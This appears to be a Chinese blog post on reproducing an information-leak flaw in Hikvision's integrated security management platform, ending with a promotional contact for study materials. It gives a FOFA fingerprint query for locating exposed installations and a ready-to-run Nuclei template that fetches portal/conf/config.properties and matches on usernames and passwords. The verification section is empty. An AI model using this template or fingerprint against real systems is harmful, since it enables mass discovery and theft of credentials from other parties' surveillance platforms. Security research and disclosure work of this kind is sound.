漏洞复现-海康威视综合安防管理平台信息泄露【附Poc】

目录

【产品介绍】

【产品系统UI】

【漏洞说明】

【指纹】

【Nuclei Poc】

【验证】

---

【产品介绍】

海康威视（Hikvision）是一家总部位于中国杭州的公司，是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机，海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案，包括视频监控、入侵检测、访客管理、停车场管理等。

【产品系统UI】

【漏洞说明】

海康威视综合安防平台portal/conf/config.properties接口存在敏感信息泄露

【指纹】

app=”HIKVISION-综合安防管理平台”

【Nuclei Poc】

id: hikvision-information

info:
  name: hikvision-information
  author: xxx
  severity: info
  description: 
  metadata:
    fofa-query: app="HIKVISION-综合安防管理平台"

requests:
  - method: GET
    path:
      - "{{BaseURL}}portal/conf/config.properties"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@bic'
          - 'username'
          - 'password'                    
      - type: status
        status:
          - 200

【验证】

点赞+在看支持一下吧~感谢看官老爷~ 

 +V【zkaq222】或者下面的扫码不然通不过哦，免费领取安全学习资料包！（私聊进群一起学习，共同进步）腾讯文档-在线文档https://docs.qq.com/doc/DYmVETWlZemh0Ymdv